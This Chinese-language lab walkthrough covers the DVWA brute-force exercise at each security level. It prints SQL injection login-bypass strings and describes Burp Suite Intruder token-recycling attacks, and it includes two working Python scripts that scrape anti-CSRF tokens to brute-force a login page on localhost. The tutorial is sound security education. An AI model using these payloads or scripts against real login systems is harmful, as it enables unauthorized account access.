DVWA通过教程之暴力破解Brute Force

原理可参考:浅谈“暴力攻击”

本文参考:

https://blog.csdn.net/qq_36119192/article/details/82938424

https://www.cnblogs.com/199904-04/p/12312769.html

Brute Force

DVWA通过教程之暴力破解Brute Force_第1张图片

Low

服务器端核心代码

DVWA通过教程之暴力破解Brute Force_第2张图片

分析:

low级别的代码直接获取用户输入的用户名和密码,密码再经过MD5进行加密,所以杜绝了通过密码进行SQL注入的可能。然后查询数据库中,查询出结果来了说明用户名和密码正确。这里对输入的用户名和密码没经过任何的过滤和检查。

漏洞利用:

方法一:爆破利用burpsuite

我们输入 admin 和任意的密码,然后用burpsuite进行抓包

DVWA通过教程之暴力破解Brute Force_第3张图片

发送到 Intruder 模块 ,这里会对所有可能的爆破点标记

我们点击 clear,然后add增加我们的密码,使其成为爆破点

我们点击 payloads,然后选择 load 来加载我们的密码字典,也可以使用paste粘贴密码,还可以使用add手动输入密码

然后点击 start attack 开始攻击

从弹出的页面可以看到,第二条的长度和其他的不一样,可以判断这个就是正确的密码了

方法二:手工SQL注入

Username :admin' or '1'='1

 Password为空  

注入成功;(原理为 and的优先级高于or

DVWA通过教程之暴力破解Brute Force_第4张图片

Username :admin' #

Password :(空) 

 注入成功

 

DVWA通过教程之暴力破解Brute Force_第5张图片

Medium

服务器端核心代码

DVWA通过教程之暴力破解Brute Force_第6张图片

DVWA通过教程之暴力破解Brute Force_第7张图片

分析:

mysqli_real_escape_string(string,connection) :函数会对字符串string中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义,基本可以抵抗SQL注入

$GLOBALS :引用全局作用域中可用的全部变量。$GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。 

可以看到,medium级别的代码对用户输入的参数进行了简单的过滤,对一些预定义字符进行了转义,基本上防止了SQL注入。还有一个措施就是如果密码输错了,则延时两秒之后才能再次提交。

这依然可以和 low 级别的爆破一样,只不过时间长了点而已。因为试一次密码要过滤2秒才能试下一个。

过程参考low级别的burpsuite暴力破解..

High

服务器端核心代码

DVWA通过教程之暴力破解Brute Force_第8张图片

分析:

stripslashes(string): 去除掉string字符的反斜杠\

mysqli_real_escape_string(string,connection) :函数会对字符串string中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义。

$GLOBALS :引用全局作用域中可用的全部变量。$GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。

High级别的代码使用了Anti-CSRF token来抵御CSRF的攻击,使用了stripslashes函数和mysqli_real_esacpe_string来抵御SQL注入和XSS的攻击。

由于使用了Anti-CSRF token,每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。所以,不建议利用burpsuite进行无脑式的爆破了。

于是利用两个python脚本来进行爆破,一个是基于python2.x的,一个是基于python3.x的,效果都一样,在这里我给大家把源代码都给贴出来了。

我先模拟我们的浏览器向服务器发送请求,然后获得token,然后再利用获得的token进行爆破。每爆破一次,获得的token都是不一样的,在这里我只模拟了20次爆破

Python2.x代码

from bs4 import BeautifulSoup
import urllib2
header={'Host':'127.0.0.1',
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Referer':'http://127.0.0.1/vulnerabilities/brute/',
        'cookie':'PHPSESSID=6oqhn9tsrs80rbf3h4cvjutnn6; security=high',
        'Connection':'close',
        'Upgrade-Insecure-Requests':'1'
        }
requrl="http://127.0.0.1/vulnerabilities/brute/"
 
def get_token(requrl,header):
    req=urllib2.Request(url=requrl,headers=header)
    response=urllib2.urlopen(req)
    print response.getcode(),
    the_page=response.read()
    print len(the_page)
    soup=BeautifulSoup(the_page,"html.parser")   #将返回的html页面解析为一个BeautifulSoup对象
    input=soup.form.select("input[type='hidden']")   #返回的是一个list列表
    user_token=input[0]['value']               #获取用户的token
    return user_token
 
user_token=get_token(requrl,header)
i=0
for line in open("E:\Password\mima.txt"):
    requrl="http://127.0.0.1/vulnerabilities/brute/?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
    i=i+1
    print i , 'admin' ,line.strip(),
    user_token=get_token(requrl,header)
    if(i==20):
        break

python3.x代码 

from bs4 import BeautifulSoup
import requests
 
header={'Host':'127.0.0.1',
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Referer':'http://127.0.0.1/vulnerabilities/brute/',
        'cookie':'PHPSESSID=8p4kb7jc1df431lo6qe249quv2; security=high',
        'Connection':'close',
        'Upgrade-Insecure-Requests':'1'
        }
requrl="http://127.0.0.1/vulnerabilities/brute/"
 
def get_token(requrl,header):
    response=requests.get(url=requrl,headers=header)
    print (response.status_code,len(response.content))
    soup=BeautifulSoup(response.text,"html.parser")
    input=soup.form.select("input[type='hidden']")   #返回的是一个list列表
    user_token=input[0]['value']                   #获取用户的token
    return user_token
 
user_token=get_token(requrl,header)
i=0
for line in open("E:\Password\mima.txt"):
    requrl="http://127.0.0.1/vulnerabilities/brute/?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
    i=i+1
    print (i , 'admin' ,line.strip(),end="  ")
    user_token=get_token(requrl,header)
    if(i==20):
        break

行脚本,可以看到,当密码是password时,返回的长度是5300,其余的返回长度都是5262,可猜想密码 password 是正确的密码。手工验证得证!

或者我们可以通过设置代理,然后Fidder抓包也可以很直观的看到返回的长度。

注:这里我们也可以使用burpsuite:

 通过抓包,可以看到,登录验证时提交了四个参数:username、password、Login以及user_token,

DVWA通过教程之暴力破解Brute Force_第9张图片

发现增加了user_token参数,所以爆破要选择两个参数来进行,先将请求发送到intruder

DVWA通过教程之暴力破解Brute Force_第10张图片

设置两个参数 password和user_token为变量,攻击类型选择pitchfork,意思是草叉模式(Pitchfork )——它可以使用多组Payload集合,在每一个不同的Payload标志位置上(最多20个),遍历所有的Payload,举例来说,如果有两个Payload标志位置,第一个Payload值为A和B,第二个Payload值为C和D,则发起攻击时,将共发起两次攻击,第一次使用的Payload分别为A和C,第二次使用的Payload分别为B和D。

DVWA通过教程之暴力破解Brute Force_第11张图片

 设置参数,在option选项卡中将攻击线程thread设置为1,因为Recursive_Grep模式不支持多线程攻击,然后选择Grep-Extract,意思是用于提取响应消息中的有用信息,点击Add,如下图进行设置,最后将Redirections设置为Always

 

DVWA通过教程之暴力破解Brute Force_第12张图片

 

DVWA通过教程之暴力破解Brute Force_第13张图片

 写上value=’  点击刷新相应信息   服务器返回的token选中(即value后面,表示每次从响应中获取该值)

DVWA通过教程之暴力破解Brute Force_第14张图片

将这个token 值先记录下来

a5f168e741600adb87c761ac45d016dd

然后设置payload,设置第一个参数载入字典,第二个参数选择Recursive grep,然后将options中的token作为第一次请求的初始值。

DVWA通过教程之暴力破解Brute Force_第15张图片

 

DVWA通过教程之暴力破解Brute Force_第16张图片

点击start attack攻击爆破,结果成功爆破

 

DVWA通过教程之暴力破解Brute Force_第17张图片

Impossible

服务端核心源代码:

DVWA通过教程之暴力破解Brute Force_第18张图片

分析:

    可以看到,impossible级别在 high 的基础上对用户的登录次数有所限制,当用户登录失败达到3次,将会锁住账号15秒,同时采用了更为安全的PDO(PHP Data Object)机制防御sql注入,这里因为不能使用PDO扩展本身执行任何数据库操作,而sql注入的关键就是通过破坏sql语句结构执行恶意的sql命令。

 

你可能感兴趣的:(Web安全之授权类)